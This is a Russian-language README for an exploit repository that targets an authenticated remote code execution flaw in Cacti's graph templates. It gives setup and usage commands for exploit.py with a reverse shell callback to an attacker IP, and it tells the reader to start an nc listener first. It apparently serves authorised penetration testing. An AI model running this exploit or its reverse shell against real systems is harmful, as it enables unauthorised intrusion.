
Эксплойт аутентифицированного удаленного выполнения кода для уязвимости шаблона графика Cacti, с полезной нагрузкой reverse shell и поддержкой прокси для авторизованного тестирования на проникновение.
Важно — прочтите это сначала:
Этот репозиторий иexploit.pyпредоставлены только для образовательных и исследовательских целей. Не используйте этот код против систем, сетей или сервисов, на которые у вас нет явного, письменного разрешения. Несанкционированный доступ к компьютерным системам незаконен и неэтичен. Используя этот код, вы соглашаетесь соблюдать применимые законы и правила вашего учреждения.
python3 -m venv venv
source venv/bin/activate
pip install requests beautifulsoup4
python3 exploit.py -u <username> -p <password> -i <attacker_ip> -l <listener_port> -url <target_url> [--proxy]
Перед запуском скрипта убедитесь, что у вас запущен nc listener. Запускайте скрипт без proxy, если только не выполняете отладку:
python3 exploit.py \
-u testuser \
-p Welcome1 \
-i 192.168.43.11 \
-l 4444 \
-url http://localhost
Последнее напоминание: Этот скрипт и README предназначены только для образовательных целей. Никогда не используйте эти инструменты для незаконного доступа к системам.